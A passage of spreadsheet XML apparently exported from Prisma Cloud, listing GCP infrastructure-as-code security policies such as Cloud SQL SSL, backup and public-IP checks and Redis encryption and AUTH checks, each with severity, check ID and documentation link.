      <c r="Q987" t="inlineStr"/>
      <c r="R987" t="inlineStr"/>
      <c r="S987" t="inlineStr"/>
      <c r="T987" t="b">
        <v>0</v>
      </c>
      <c r="U987" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V987" t="inlineStr">
        <is>
          <t>IaC:General:google-pubsub-topic-iam-member,google-pubsub-topic-iam-binding</t>
        </is>
      </c>
      <c r="W987" t="inlineStr">
        <is>
          <t>Ensure that Pub/Sub Topics are not anonymously or publicly accessible</t>
        </is>
      </c>
      <c r="X987" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-pubsub-topic-is-not-anonymously-or-publicly-accessible</t>
        </is>
      </c>
      <c r="Y987" t="inlineStr"/>
      <c r="Z987" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_pubsub_topic_iam_member", "google_pubsub_topic_iam_binding"]}</t>
        </is>
      </c>
      <c r="AA987" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB987" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC987" t="inlineStr">
        <is>
          <t>CKV_GCP_99</t>
        </is>
      </c>
      <c r="AD987" t="b">
        <v>1</v>
      </c>
      <c r="AE987" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF987" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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7" t="inlineStr">
        <is>
          <t>8a6f206c-9d55-4acc-bc84-c07fd4689404</t>
        </is>
      </c>
      <c r="AI987" t="inlineStr"/>
      <c r="AJ987" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK987" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="988">
      <c r="A988" t="inlineStr"/>
      <c r="B988" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C988" s="2" t="inlineStr"/>
      <c r="D988" t="inlineStr"/>
      <c r="E988" t="inlineStr"/>
      <c r="F988" t="inlineStr"/>
      <c r="G988" t="b">
        <v>1</v>
      </c>
      <c r="H9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8" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J988" t="inlineStr">
        <is>
          <t>IaC:General:google-redis</t>
        </is>
      </c>
      <c r="K988" t="inlineStr">
        <is>
          <t>GCP Memorystore for Redis does not use intransit encryption</t>
        </is>
      </c>
      <c r="L988" t="inlineStr"/>
      <c r="M988" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N988" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O988" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P988" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q988" t="inlineStr"/>
      <c r="R988" t="inlineStr"/>
      <c r="S988" t="inlineStr"/>
      <c r="T988" t="b">
        <v>0</v>
      </c>
      <c r="U988" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V988" t="inlineStr">
        <is>
          <t>IaC:General:google-redis-instance</t>
        </is>
      </c>
      <c r="W988" t="inlineStr">
        <is>
          <t>Ensure Memorystore for Redis uses intransit encryption</t>
        </is>
      </c>
      <c r="X988" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-memorystore-for-redis-uses-intransit-encryption</t>
        </is>
      </c>
      <c r="Y988" t="inlineStr"/>
      <c r="Z988" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_redis_instance"]}</t>
        </is>
      </c>
      <c r="AA988" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB988" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC988" t="inlineStr">
        <is>
          <t>CKV_GCP_97</t>
        </is>
      </c>
      <c r="AD988" t="b">
        <v>1</v>
      </c>
      <c r="AE988" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF988" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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8" t="inlineStr">
        <is>
          <t>31eb817a-15ca-4bfa-a92b-0afa481eb4de</t>
        </is>
      </c>
      <c r="AI988" t="inlineStr"/>
      <c r="AJ988" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK988" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="989">
      <c r="A989" t="inlineStr"/>
      <c r="B989" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C989" s="2" t="inlineStr"/>
      <c r="D989" t="inlineStr"/>
      <c r="E989" t="inlineStr"/>
      <c r="F989" t="inlineStr"/>
      <c r="G989" t="b">
        <v>1</v>
      </c>
      <c r="H9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89" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J989" t="inlineStr">
        <is>
          <t>IaC:General:google-redis</t>
        </is>
      </c>
      <c r="K989" t="inlineStr">
        <is>
          <t>GCP Memorystore for Redis has AUTH disabled</t>
        </is>
      </c>
      <c r="L989" t="inlineStr"/>
      <c r="M989" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N989" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O989" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P989" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q989" t="inlineStr"/>
      <c r="R989" t="inlineStr"/>
      <c r="S989" t="inlineStr"/>
      <c r="T989" t="b">
        <v>0</v>
      </c>
      <c r="U989" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V989" t="inlineStr">
        <is>
          <t>IaC:General:google-redis-instance</t>
        </is>
      </c>
      <c r="W989" t="inlineStr">
        <is>
          <t>Ensure Memorystore for Redis has AUTH enabled</t>
        </is>
      </c>
      <c r="X989" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-memorystore-for-redis-is-auth-enabled</t>
        </is>
      </c>
      <c r="Y989" t="inlineStr"/>
      <c r="Z989" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_redis_instance"]}</t>
        </is>
      </c>
      <c r="AA989" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB989" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC989" t="inlineStr">
        <is>
          <t>CKV_GCP_95</t>
        </is>
      </c>
      <c r="AD989" t="b">
        <v>1</v>
      </c>
      <c r="AE989" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF989" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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89" t="inlineStr">
        <is>
          <t>b485b8a5-1a76-42d3-ba14-aa51e9bc5700</t>
        </is>
      </c>
      <c r="AI989" t="inlineStr"/>
      <c r="AJ989" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK989" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="990">
      <c r="A990" t="inlineStr"/>
      <c r="B990" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C990" s="2" t="inlineStr"/>
      <c r="D990" t="inlineStr"/>
      <c r="E990" t="inlineStr"/>
      <c r="F990" t="inlineStr"/>
      <c r="G990" t="b">
        <v>1</v>
      </c>
      <c r="H9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0" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J990" t="inlineStr">
        <is>
          <t>IaC:General:google-spanner</t>
        </is>
      </c>
      <c r="K990" t="inlineStr">
        <is>
          <t>Spanner Database does not have drop protection enabled</t>
        </is>
      </c>
      <c r="L990" t="inlineStr"/>
      <c r="M990" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N990" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O990" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P990" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q990" t="inlineStr"/>
      <c r="R990" t="inlineStr"/>
      <c r="S990" t="inlineStr"/>
      <c r="T990" t="b">
        <v>0</v>
      </c>
      <c r="U990" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V990" t="inlineStr">
        <is>
          <t>IaC:General:google-spanner-database</t>
        </is>
      </c>
      <c r="W990" t="inlineStr">
        <is>
          <t>Ensure Spanner Database has drop protection enabled</t>
        </is>
      </c>
      <c r="X990" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-120</t>
        </is>
      </c>
      <c r="Y990" t="inlineStr"/>
      <c r="Z990" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_spanner_database"]}</t>
        </is>
      </c>
      <c r="AA990" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB990" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC990" t="inlineStr">
        <is>
          <t>CKV_GCP_120</t>
        </is>
      </c>
      <c r="AD990" t="b">
        <v>1</v>
      </c>
      <c r="AE990" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF990" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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0" t="inlineStr">
        <is>
          <t>6e358244-f073-4e92-8938-423710980f94</t>
        </is>
      </c>
      <c r="AI990" t="inlineStr"/>
      <c r="AJ990" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK990" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="991">
      <c r="A991" t="inlineStr"/>
      <c r="B991" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C991" s="2" t="inlineStr"/>
      <c r="D991" t="inlineStr"/>
      <c r="E991" t="inlineStr"/>
      <c r="F991" t="inlineStr"/>
      <c r="G991" t="b">
        <v>1</v>
      </c>
      <c r="H9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1" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J991" t="inlineStr">
        <is>
          <t>IaC:General:google-spanner</t>
        </is>
      </c>
      <c r="K991" t="inlineStr">
        <is>
          <t>GCP Spanner Database is not encrypted with Customer Supplied Encryption Keys (CSEKs)</t>
        </is>
      </c>
      <c r="L991" t="inlineStr"/>
      <c r="M991" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N991" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O991" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P991" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q991" t="inlineStr"/>
      <c r="R991" t="inlineStr"/>
      <c r="S991" t="inlineStr"/>
      <c r="T991" t="b">
        <v>0</v>
      </c>
      <c r="U991" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V991" t="inlineStr">
        <is>
          <t>IaC:General:google-spanner-database</t>
        </is>
      </c>
      <c r="W991" t="inlineStr">
        <is>
          <t>Ensure Spanner Database is encrypted with Customer Supplied Encryption Keys (CSEK)</t>
        </is>
      </c>
      <c r="X991" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-spanner-database-is-encrypted-with-customer-supplied-encryption-keys-cseks</t>
        </is>
      </c>
      <c r="Y991" t="inlineStr"/>
      <c r="Z991" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_spanner_database"]}</t>
        </is>
      </c>
      <c r="AA991" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB991" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC991" t="inlineStr">
        <is>
          <t>CKV_GCP_93</t>
        </is>
      </c>
      <c r="AD991" t="b">
        <v>1</v>
      </c>
      <c r="AE991" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF991" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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1" t="inlineStr">
        <is>
          <t>8f4dcb9b-5a0c-43ad-b323-1de833542647</t>
        </is>
      </c>
      <c r="AI991" t="inlineStr"/>
      <c r="AJ991" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK991" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="992">
      <c r="A992" t="inlineStr"/>
      <c r="B992" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C992" s="2" t="inlineStr"/>
      <c r="D992" t="inlineStr"/>
      <c r="E992" t="inlineStr"/>
      <c r="F992" t="inlineStr"/>
      <c r="G992" t="b">
        <v>1</v>
      </c>
      <c r="H9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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J992" t="inlineStr">
        <is>
          <t>IaC:General:google-spanner</t>
        </is>
      </c>
      <c r="K992" t="inlineStr">
        <is>
          <t>Deletion protection for Spanner Database is disabled</t>
        </is>
      </c>
      <c r="L992" t="inlineStr"/>
      <c r="M992" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N992" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O992" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P992" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q992" t="inlineStr"/>
      <c r="R992" t="inlineStr"/>
      <c r="S992" t="inlineStr"/>
      <c r="T992" t="b">
        <v>0</v>
      </c>
      <c r="U992" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V992" t="inlineStr">
        <is>
          <t>IaC:General:google-spanner-database</t>
        </is>
      </c>
      <c r="W992" t="inlineStr">
        <is>
          <t>Ensure Spanner Database has deletion protection enabled</t>
        </is>
      </c>
      <c r="X992" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-google-cloud-119</t>
        </is>
      </c>
      <c r="Y992" t="inlineStr"/>
      <c r="Z992" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_spanner_database"]}</t>
        </is>
      </c>
      <c r="AA992" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB992" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC992" t="inlineStr">
        <is>
          <t>CKV_GCP_119</t>
        </is>
      </c>
      <c r="AD992" t="b">
        <v>1</v>
      </c>
      <c r="AE992" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF992" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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2" t="inlineStr">
        <is>
          <t>00475a66-aff3-4853-8960-6e97cd73332b</t>
        </is>
      </c>
      <c r="AI992" t="inlineStr"/>
      <c r="AJ992" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK992" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="993">
      <c r="A993" t="inlineStr"/>
      <c r="B993" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C993" s="2" t="inlineStr"/>
      <c r="D993" t="inlineStr"/>
      <c r="E993" t="inlineStr"/>
      <c r="F993" t="inlineStr"/>
      <c r="G993" t="b">
        <v>1</v>
      </c>
      <c r="H9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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J993" t="inlineStr">
        <is>
          <t>IaC:General:google-sql</t>
        </is>
      </c>
      <c r="K993" t="inlineStr">
        <is>
          <t>GCP SQL database does not use the latest Major version</t>
        </is>
      </c>
      <c r="L993" t="inlineStr"/>
      <c r="M993" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N993" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O993" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P993" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q993" t="inlineStr"/>
      <c r="R993" t="inlineStr"/>
      <c r="S993" t="inlineStr"/>
      <c r="T993" t="b">
        <v>0</v>
      </c>
      <c r="U993" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V993" t="inlineStr">
        <is>
          <t>IaC:General:google-sql-database-instance</t>
        </is>
      </c>
      <c r="W993" t="inlineStr">
        <is>
          <t>Ensure SQL database is using latest Major version</t>
        </is>
      </c>
      <c r="X993" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-sql-database-uses-the-latest-major-version</t>
        </is>
      </c>
      <c r="Y993" t="inlineStr"/>
      <c r="Z993" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_sql_database_instance"]}</t>
        </is>
      </c>
      <c r="AA993" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB993" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC993" t="inlineStr">
        <is>
          <t>CKV_GCP_79</t>
        </is>
      </c>
      <c r="AD993" t="b">
        <v>1</v>
      </c>
      <c r="AE993" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF993" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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3" t="inlineStr">
        <is>
          <t>f13dff47-149d-4a80-b8ab-8cdb6d9aee7b</t>
        </is>
      </c>
      <c r="AI993" t="inlineStr"/>
      <c r="AJ993" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK993" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="994">
      <c r="A994" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, CSA CCM v.4.0.6, CSA CCM v.4.0.6, ISO 27002:2022, CSA CCM v4.0.12, CSA CCM v.4.0.6, CSA CCM v.4.0.6, ISO 27002:2022, ISO/IEC 27001:2022, CSA CCM v4.0.12, CSA CCM v.4.0.6, ISO/IEC 27001:2022, CSA CCM v4.0.12, CSA CCM v4.0.12, ISO 27002:2022</t>
        </is>
      </c>
      <c r="B994" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C994" s="2" t="inlineStr"/>
      <c r="D994" t="inlineStr"/>
      <c r="E994" t="inlineStr"/>
      <c r="F994" t="inlineStr"/>
      <c r="G994" t="b">
        <v>1</v>
      </c>
      <c r="H9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4" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J994" t="inlineStr">
        <is>
          <t>IaC:General:google-sql</t>
        </is>
      </c>
      <c r="K994" t="inlineStr">
        <is>
          <t>GCP SQL Instances do not have SSL configured for incoming connections</t>
        </is>
      </c>
      <c r="L994" t="inlineStr"/>
      <c r="M994" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N994" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O994" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P994" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q994" t="inlineStr">
        <is>
          <t>Technological controls</t>
        </is>
      </c>
      <c r="R994" t="inlineStr">
        <is>
          <t>8.1</t>
        </is>
      </c>
      <c r="S994" t="inlineStr"/>
      <c r="T994" t="b">
        <v>0</v>
      </c>
      <c r="U994" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V994" t="inlineStr">
        <is>
          <t>IaC:General:google-sql-database-instance</t>
        </is>
      </c>
      <c r="W994" t="inlineStr">
        <is>
          <t>Ensure all Cloud SQL database instance requires all incoming connections to use SSL</t>
        </is>
      </c>
      <c r="X994" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-1</t>
        </is>
      </c>
      <c r="Y994" t="inlineStr"/>
      <c r="Z994" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_sql_database_instance"]}</t>
        </is>
      </c>
      <c r="AA994" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB994" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC994" t="inlineStr">
        <is>
          <t>CKV_GCP_6</t>
        </is>
      </c>
      <c r="AD994" t="b">
        <v>1</v>
      </c>
      <c r="AE994" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF994" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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4" t="inlineStr">
        <is>
          <t>b497449f-7a19-49e0-a715-8d0cc95090e9</t>
        </is>
      </c>
      <c r="AI994" t="inlineStr"/>
      <c r="AJ994" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK994" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="995">
      <c r="A995" t="inlineStr"/>
      <c r="B995" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C995" s="2" t="inlineStr"/>
      <c r="D995" t="inlineStr"/>
      <c r="E995" t="inlineStr"/>
      <c r="F995" t="inlineStr"/>
      <c r="G995" t="b">
        <v>1</v>
      </c>
      <c r="H9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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J995" t="inlineStr">
        <is>
          <t>IaC:General:google-sql</t>
        </is>
      </c>
      <c r="K995" t="inlineStr">
        <is>
          <t>GCP SQL database instance does not have backup configuration enabled</t>
        </is>
      </c>
      <c r="L995" t="inlineStr"/>
      <c r="M995" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N995" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O995" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P995" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q995" t="inlineStr"/>
      <c r="R995" t="inlineStr"/>
      <c r="S995" t="inlineStr"/>
      <c r="T995" t="b">
        <v>0</v>
      </c>
      <c r="U995" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V995" t="inlineStr">
        <is>
          <t>IaC:General:google-sql-database-instance</t>
        </is>
      </c>
      <c r="W995" t="inlineStr">
        <is>
          <t>Ensure all Cloud SQL database instance have backup configuration enabled</t>
        </is>
      </c>
      <c r="X995" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-2</t>
        </is>
      </c>
      <c r="Y995" t="inlineStr"/>
      <c r="Z995" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_sql_database_instance"]}</t>
        </is>
      </c>
      <c r="AA995" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB995" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC995" t="inlineStr">
        <is>
          <t>CKV_GCP_14</t>
        </is>
      </c>
      <c r="AD995" t="b">
        <v>1</v>
      </c>
      <c r="AE995" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF995" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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5" t="inlineStr">
        <is>
          <t>8c45d706-65cc-440f-a60c-d635a3ad503a</t>
        </is>
      </c>
      <c r="AI995" t="inlineStr"/>
      <c r="AJ995" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK995" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="996">
      <c r="A996" t="inlineStr"/>
      <c r="B996" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C996" s="2" t="inlineStr"/>
      <c r="D996" t="inlineStr"/>
      <c r="E996" t="inlineStr"/>
      <c r="F996" t="inlineStr"/>
      <c r="G996" t="b">
        <v>1</v>
      </c>
      <c r="H9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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J996" t="inlineStr">
        <is>
          <t>IaC:General:google-sql</t>
        </is>
      </c>
      <c r="K996" t="inlineStr">
        <is>
          <t>GCP Cloud SQL database instances have public IPs</t>
        </is>
      </c>
      <c r="L996" t="inlineStr"/>
      <c r="M996" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N996" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O996" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P996" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q996" t="inlineStr"/>
      <c r="R996" t="inlineStr"/>
      <c r="S996" t="inlineStr"/>
      <c r="T996" t="b">
        <v>0</v>
      </c>
      <c r="U996" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V996" t="inlineStr">
        <is>
          <t>IaC:General:google-sql-database-instance</t>
        </is>
      </c>
      <c r="W996" t="inlineStr">
        <is>
          <t>Ensure SQL database do not have public IP</t>
        </is>
      </c>
      <c r="X996" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-11</t>
        </is>
      </c>
      <c r="Y996" t="inlineStr"/>
      <c r="Z996" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_sql_database_instance"]}</t>
        </is>
      </c>
      <c r="AA996" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB996" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC996" t="inlineStr">
        <is>
          <t>CKV_GCP_60</t>
        </is>
      </c>
      <c r="AD996" t="b">
        <v>1</v>
      </c>
      <c r="AE996" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF996" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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6" t="inlineStr">
        <is>
          <t>9de130c6-1748-421c-b2c1-c8ad6f601912</t>
        </is>
      </c>
      <c r="AI996" t="inlineStr"/>
      <c r="AJ996" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK996" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="997">
      <c r="A997" t="inlineStr"/>
      <c r="B997" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C997" s="2" t="inlineStr"/>
      <c r="D997" t="inlineStr"/>
      <c r="E997" t="inlineStr"/>
      <c r="F997" t="inlineStr"/>
      <c r="G997" t="b">
        <v>1</v>
      </c>
      <c r="H9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7" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J997" t="inlineStr">
        <is>
          <t>IaC:General:google-storage</t>
        </is>
      </c>
      <c r="K997" t="inlineStr">
        <is>
          <t>GCP Cloud storage does not have versioning enabled</t>
        </is>
      </c>
      <c r="L997" t="inlineStr"/>
      <c r="M997" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N997" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O997" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P997" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q997" t="inlineStr"/>
      <c r="R997" t="inlineStr"/>
      <c r="S997" t="inlineStr"/>
      <c r="T997" t="b">
        <v>0</v>
      </c>
      <c r="U997" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V997" t="inlineStr">
        <is>
          <t>IaC:General:google-storage-bucket</t>
        </is>
      </c>
      <c r="W997" t="inlineStr">
        <is>
          <t>Ensure Cloud storage has versioning enabled</t>
        </is>
      </c>
